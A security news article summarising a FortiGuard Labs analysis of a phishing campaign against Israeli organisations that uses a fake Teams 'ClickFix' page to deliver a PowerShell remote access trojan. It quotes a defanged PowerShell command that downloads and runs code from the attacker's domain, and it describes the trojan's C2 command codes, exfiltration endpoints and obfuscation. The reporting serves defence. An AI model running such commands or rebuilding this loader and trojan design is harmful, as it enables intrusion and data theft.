Threat actors have begun a geographically focused campaign against Israeli infrastructure and corporate entities in a sophisticated cyber incursion discovered by Fortinet’s FortiGuard Labs.
Delivered exclusively through Windows systems via PowerShell scripts, the attack chain enables remote access, facilitating data exfiltration, persistent surveillance, and lateral movement within compromised networks.
Classified as high severity, this operation leverages phishing emails disguised as invitations to mentoring sessions on wartime medical supply management, exploiting compromised internal email systems to propagate lures and increase infection rates.
The full attack flow relies on a multi-stage PowerShell-based delivery mechanism, avoiding external executables to evade traditional antivirus detection, with payloads fetched from actor-controlled domains like pharmacynod[.]com.
Phishing Campaign Hits Israeli Sectors
The initial access vector begins with phishing emails urging recipients to click embedded links, redirecting them to a spoofed Microsoft Teams interface.
This fake page employs a social engineering tactic known as “ClickFix,” instructing users to press Windows + R to open the Run dialog, paste a clipboard-copied string, and execute it effectively masking the launch of a malicious PowerShell command.
Embedded in the site’s HTML are three obfuscated Base64-encoded strings that, when decoded, form a command like “powershell IEX ((Invoke-RestMethod -Uri hxxps://pharmacynod[.]com/Fix -Method GET).note.body),” which retrieves and runs a secondary script from the attacker’s server.
This loader downloads files such as test.html to the victim’s Public Downloads folder, containing binary-encoded blobs separated by delimiters like “kendrick.”
A follow-up PowerShell script processes these blobs by splitting, converting binary to ASCII characters, and reassembling them into executable code, ultimately deploying a remote access trojan (RAT) entirely in PowerShell.
Obfuscated Payloads
Deeper analysis reveals the RAT’s loader behavior involves downloading obfuscated content, including compressed Base64 strings decompressed via custom functions for in-memory execution.
For instance, scripts read specific lines from test.html, extract tagged strings, split on delimiters, perform binary-to-character conversions (e.g., “1100110” binary equals decimal 102, mapping to character “f”), and invoke the resulting code with IEX.
This chain culminates in a persistent RAT that hard-codes its command-and-control (C2) server to pharmacynod[.]com, using HTTPS for all communications.
Upon infection, an “init” function gathers victim details like Windows domain, computer name, and username, compresses and reverses them twice with GZip and Base64, then registers via the /16625 endpoint.
The RAT maintains persistence through an infinite polling loop, sleeping for random intervals (2-7 seconds) before POST requests to retrieve commands.
Responses from the C2 are compressed, reversed, and prefixed with codes like 7979 for reinitialization, 5322 for payload downloads via System.Net.WebClient, 4622 for adjusting poll intervals, or 2474 for arbitrary PowerShell execution with output exfiltrated to /17361.
Evasion techniques include layered obfuscation double GZip, Base64 encoding, string reversal, and URL-safe replacements combined with native .NET HTTP requests mimicking legitimate traffic through default credentials, proxies, and user-agents set via urlmon.dll.
Attribution points to potential overlaps with MuddyWater, a known threat group, due to regional targeting, lateral expansion from compromised environments, and scripting tactics.
However, deviations like avoiding remote management tools and public file hosts, plus the novel all-PowerShell RAT, suggest possible evolution or imitation by another actor.
This campaign underscores the risks of living-off-the-land attacks, with Fortinet protections including antivirus signatures like PowerShell/Agent.PH!tr, endpoint detection via FortiEDR, and network blocking through IPS and DNS filtering to mitigate such threats.
Indicators of Compromise
| IOC | Description |
|---|---|
| hxxps://pharmacynod[.]com/ | Hard-coded C2 |
| hxxps://pharmacynod[.]com/16625 | Victim registration / check-in |
| hxxps://pharmacynod[.]com/17361 | Exfiltrated command results |
| 46a76b3c7851f30d68ebc6a5584bc099435b0544d8707fff7a9178f46046708b | SHA256 of PowerShell RAT |
Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!
Source link
